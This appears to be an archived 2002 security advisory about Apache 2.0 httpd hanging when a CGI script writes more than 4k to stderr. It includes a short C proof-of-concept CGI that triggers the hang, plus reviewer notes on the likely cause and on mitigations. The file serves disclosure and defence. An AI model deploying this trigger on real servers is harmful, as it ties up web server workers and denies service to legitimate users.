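/*
 * -----BEGIN PGP SIGNED MESSAGE-----
 * Hash: SHA1
 *
 * - -=~=-_-=~=-_-=~=-
 * I put PHP in the title so I know this message will reach the
 * "sekur1ty c0mmun1ty", that *knows* that PHP is bad, because it's easy to
 * write insecure applications, unlike C.
 * - -=~=-_-=~=-_-=~=-
 *
 * Problem:
 *   o Apache 2.0 (.39 and .40 tested) on Linuxx0r (and possibly other OS's)
 *     will hang on a write to stderr that is larger than the default buffer
 *     size (4k on Linux)
 *
 * Impact:
 *   o Local users can cause apache's httpd process to hang
 *   o Possible new DoS to look for in web apps that write user input to
 *     stderr!
 *
 * Tested on:
 *   o Linux (RedHat)
 *   o FreeBSD (did not show a problem, but not well tested)
 *
 * Notification:
 *   o The Apache Projekt was contacted July 9th, 2002
 *     (http://nagoya.apache.org/bugzilla/show_bug.cgi?id=10515)
 *
 * - -=~=-_-=~=-_-=~=-
 * Sample Code
 * - -=~=-_-=~=-_-=~=-
 *
 * Reviewer notes (not part of the signed advisory):
 *   - The advisory does not state the root cause. The symptom is consistent
 *     with the server not draining the CGI's stderr pipe while it waits on
 *     the script's stdout, so the child blocks once the pipe is full --
 *     confirm against the referenced bug report.
 *   - For application owners the practical takeaway is the second impact
 *     bullet: request-controlled data written to stderr from a CGI should be
 *     length-bounded before it is logged.
 *   - For operators: CGI children stuck in a blocked write, together with
 *     httpd workers that never complete the request, are the observable
 *     sign; request/CGI timeouts limit how long a worker stays tied up.
 */

// Credit to: K.C. Wong
#include <stdio.h>
#include <stdlib.h>   /* exit(); missing from the listing as posted */
#include <time.h>
#include <unistd.h>
#include <fcntl.h>

/*
 * Size of the filler buffer, including its terminating NUL.  With the two
 * fixed strings used below, the stderr output totals
 * 11 ("short test\n") + 11 ("test error=") + 4074 + 1 ("\n") = 4097 bytes,
 * i.e. just over the 4k figure the advisory cites for Linux.
 */
#define SIZE 4075

/*
 * Write a short line and then one long line to stderr, flushing after each.
 *
 * The long line carries SIZE - 1 characters cycling through 'a'..'z'.
 * Return values of fprintf()/fflush() are not checked, as in the original
 * listing; the function has no result other than the bytes written to
 * stderr.
 */
void out_err(void)
{
    char buffer[SIZE];
    int i = 0;

    /* Fill with a repeating lowercase alphabet and NUL-terminate. */
    for (i = 0; i < SIZE - 1; ++i)
        buffer[i] = 'a' + (char )(i % 26);
    buffer[SIZE - 1] = '\0';

    /*
     * Left disabled by the author.  It would switch fd 2 to non-blocking
     * mode -- presumably so the write fails instead of blocking; the
     * advisory does not say whether that was tested.
     */
    // fcntl(2, F_SETFL, fcntl(2, F_GETFL) | O_NONBLOCK);

    fprintf(stderr, "short test\n");
    fflush(stderr);

    fprintf(stderr, "test error=%s\n", buffer);
    fflush(stderr);
} // out_err()

/*
 * CGI entry point: emit a header and blank lines on stdout, call out_err()
 * to produce the stderr output, then emit a small HTML page and exit 0.
 *
 * NOTE(review): the header name is spelled "Context-Type" in the advisory as
 * posted (likely meant "Content-Type"); the string is kept exactly as
 * published so the listing matches what the author tested.
 */
int main(int argc, char ** argv)
{
    /* Command-line arguments are unused. */
    (void)argc;
    (void)argv;

    fprintf(stdout, "Context-Type: text/html\r\n");
    fprintf(stdout, "\r\n\r\n");

    /* stdout has not been flushed yet when the stderr writes happen. */
    out_err();

    fprintf(stdout, "<HTML>\n");
    fprintf(stdout, "<body>\n");
    fprintf(stdout, "<h1>hello world</h1>\n");
    fprintf(stdout, "</body>\n");
    fprintf(stdout, "</HTML>\n");
    fflush(stdout);
    exit(0);
} // main()

/*
 * Signature block as posted.  It covers the original message bytes, not
 * this reflowed copy, so it will not verify against the text above.
 *
 * -----BEGIN PGP SIGNATURE-----
 * Version: Hush 2.1
 * Note: This signature can be verified at https://www.hushtools.com
 *
 * wlgEARECABgFAj2Pa0MRHHNoYWRkdXBAaHVzaC5jb20ACgkQ8iAl114OGrxaHwCgsmGs
 * 262aOmBHEUw01ktoAADRIz0AoJOdidtdbVswjjp0sqn1uHW+EQCT
 * =8PKT
 * -----END PGP SIGNATURE-----
 */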